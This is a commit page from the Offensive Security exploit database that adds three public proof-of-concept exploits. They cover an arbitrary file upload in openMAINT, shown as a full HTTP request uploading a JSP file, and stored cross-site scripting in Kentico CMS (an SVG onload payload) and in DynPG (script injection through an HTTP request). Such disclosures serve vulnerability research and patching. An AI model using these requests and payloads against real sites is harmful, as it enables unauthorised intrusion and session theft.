DB: 2020-10-10
3 changes to exploits/shellcodes Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated) openMAINT 1.1-2.4.2 - Arbitrary File Upload
This commit is contained in:
Offensive Security
parent
b45931e440
commit
0aa8d538e2
4 changed files with 168 additions and 0 deletions
78
exploits/json/webapps/48866.txt
Normal file
78
exploits/json/webapps/48866.txt
Normal file
|
|
@ -0,0 +1,78 @@
|
|||
# Exploit Title: openMAINT 1.1-2.4.2 - Arbitrary File Upload
|
||||
# Dork: N/A
|
||||
# Date: 2020-08-19
|
||||
# Exploit Author: mrb3n
|
||||
# Vendor Homepage: https://www.openmaint.org/en
|
||||
# Software Link: https://sourceforge.net/projects/openmaint/files/1.1/openmaint-1.1-2.4.2.zip/download
|
||||
# Version: 1.1-2.4.2
|
||||
# Category: Webapps
|
||||
# Tested on: Ubuntu 16.04
|
||||
# CVE: N/A
|
||||
|
||||
|
||||
# POC: http://localhost:8080/openmaint/administration.jsp
|
||||
#
|
||||
POST /openmaint/services/json/file/upload?CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf HTTP/1.1
|
||||
|
||||
Host: 192.168.1.1:8080
|
||||
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
Content-Type: multipart/form-data; boundary=---------------------------12239060382062588071523757460
|
||||
|
||||
Content-Length: 1369
|
||||
|
||||
Origin: http://192.168.1.1:8080
|
||||
|
||||
DNT: 1
|
||||
|
||||
Connection: close
|
||||
|
||||
Referer: http://192.168.1.1:8080/openmaint/administration.jsp
|
||||
|
||||
Cookie: JSESSIONID=5BAAEBDCC2151BD59ED2CD6FD3CA8165; CMDBuild-Authorization=fnlt93ijq0dru5qtenme73d4lf
|
||||
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
|
||||
|
||||
-----------------------------12239060382062588071523757460
|
||||
|
||||
Content-Disposition: form-data; name="fileStore"
|
||||
|
||||
|
||||
|
||||
images
|
||||
|
||||
-----------------------------12239060382062588071523757460
|
||||
|
||||
Content-Disposition: form-data; name="folder"
|
||||
|
||||
|
||||
|
||||
d41d8cd98f00b204e9800998ecf8427e
|
||||
|
||||
-----------------------------12239060382062588071523757460
|
||||
|
||||
Content-Disposition: form-data; name="file"; filename="malicious.jsp"
|
||||
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
|
||||
[Malicious code here]
|
||||
|
||||
|
||||
-----------------------------12239060382062588071523757460--
|
||||
|
||||
|
||||
# The malicious file will be uploaded directly to the /upload/images directory with the file name unchanged, example:
|
||||
http://192.168.1.1:8080/openmaint/upload/images/malicious.jsp
|
||||
# How to fix: Update to the latest version
|
||||
# Earlier versions as well as other 1.1-x versions are likely vulnerable.
|
||||
34
exploits/php/webapps/48864.txt
Normal file
34
exploits/php/webapps/48864.txt
Normal file
|
|
@ -0,0 +1,34 @@
|
|||
# Exploit Title: Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting
|
||||
# Exploit Author: Ataberk YAVUZER
|
||||
# CVE: CVE-2019-19493
|
||||
# Type: Webapps
|
||||
# Vendor Homepage: https://www.kentico.com/
|
||||
# Version: 9.0-12.0.49
|
||||
# Date: 29-11-2019
|
||||
|
||||
#CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2019-19493
|
||||
|
||||
Details
|
||||
|
||||
Persistent Cross Site Scripting vulnerability has been found on the
|
||||
Admin/User Panel. Kentico before 12.0.50 allows file uploads in which the
|
||||
Content-Type header is inconsistent with the file extension, leading to XSS.
|
||||
|
||||
# Steps to reproduce
|
||||
|
||||
1. Log in to Kentico Admin Panel with your credentials.
|
||||
2. Browse to Profile Page.
|
||||
3. Click to "Browse" button on Avatar section.
|
||||
4. Select "avatar.svg" file which can be found on below.
|
||||
5. Intercept the request before clicking to save button.
|
||||
6. Change file name to "avatar.svg.png" and send the request. (MimeType
|
||||
needs to be "image/xml+svg")
|
||||
7. Kentico will generate an avatar link: "
|
||||
http://example.kentico.com/admin/CMSPages/GetAvatar.aspx?avatarguid=<generated_avatar_uid>"
|
||||
Send that link to another user.
|
||||
8. An alert with cookie values will pop up.
|
||||
|
||||
|
||||
#Content of the avatar.svg:
|
||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
|
||||
53
exploits/php/webapps/48865.txt
Normal file
53
exploits/php/webapps/48865.txt
Normal file
|
|
@ -0,0 +1,53 @@
|
|||
# Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)
|
||||
# Date: 2020-10-09
|
||||
# Exploit Author: Enes Özeser
|
||||
# Vendor Homepage: https://dynpg.org/
|
||||
# Version: 4.9.1
|
||||
# Tested on: Windows & XAMPP
|
||||
|
||||
==> Tutorial <==
|
||||
|
||||
1- Login to admin panel.
|
||||
2- Click on the "Texts" button.
|
||||
3- Write XSS payload into the Groupname.
|
||||
4- Press "Create" button.
|
||||
|
||||
XSS Payload ==> <script>alert("XSS");</script>
|
||||
|
||||
==> HTTP Request <==
|
||||
|
||||
POST /index.php?show=4 HTTP/1.1
|
||||
Host: (HOST)
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: multipart/form-data; boundary=---------------------------342819783638885794661955465553
|
||||
Content-Length: 725
|
||||
Origin: http://(HOST)
|
||||
Connection: close
|
||||
Referer: http://(HOST)/index.php?show=4
|
||||
Cookie: PHPSESSID=bsbas234jfvvdasdasd1i
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
-----------------------------342819783638885794661955465553
|
||||
Content-Disposition: form-data; name="NEW_GROUP_NAME"
|
||||
|
||||
<script>alert("XSS");</script>
|
||||
-----------------------------342819783638885794661955465553
|
||||
Content-Disposition: form-data; name="GROUP_ID"
|
||||
|
||||
0
|
||||
-----------------------------342819783638885794661955465553
|
||||
Content-Disposition: form-data; name="GRP_SUBMIT"
|
||||
|
||||
Create
|
||||
-----------------------------342819783638885794661955465553
|
||||
Content-Disposition: form-data; name="GRP_ACTION"
|
||||
|
||||
new_grp
|
||||
-----------------------------342819783638885794661955465553
|
||||
Content-Disposition: form-data; name="dpg_csrf_token"
|
||||
|
||||
3F16478C29BED20AA73F1D25CB23F471
|
||||
-----------------------------342819783638885794661955465553--
|
||||
|
|
@ -40682,6 +40682,9 @@ id,file,description,date,author,type,platform,port
|
|||
48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,
|
||||
48862,exploits/php/webapps/48862.py,"SEO Panel 4.6.0 - Remote Code Execution",2020-10-08,"Kiko Andreu",webapps,php,
|
||||
48863,exploits/hardware/webapps/48863.txt,"D-Link DSR-250N 3.12 - Denial of Service (PoC)",2020-10-08,"RedTeam Pentesting GmbH",webapps,hardware,
|
||||
48864,exploits/php/webapps/48864.txt,"Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting",2020-10-09,"Ataberk YAVUZER",webapps,php,
|
||||
48865,exploits/php/webapps/48865.txt,"DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-09,"Enes Özeser",webapps,php,
|
||||
48866,exploits/json/webapps/48866.txt,"openMAINT 1.1-2.4.2 - Arbitrary File Upload",2020-10-09,mrb3n,webapps,json,
|
||||
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
|
||||
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
|
||||
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue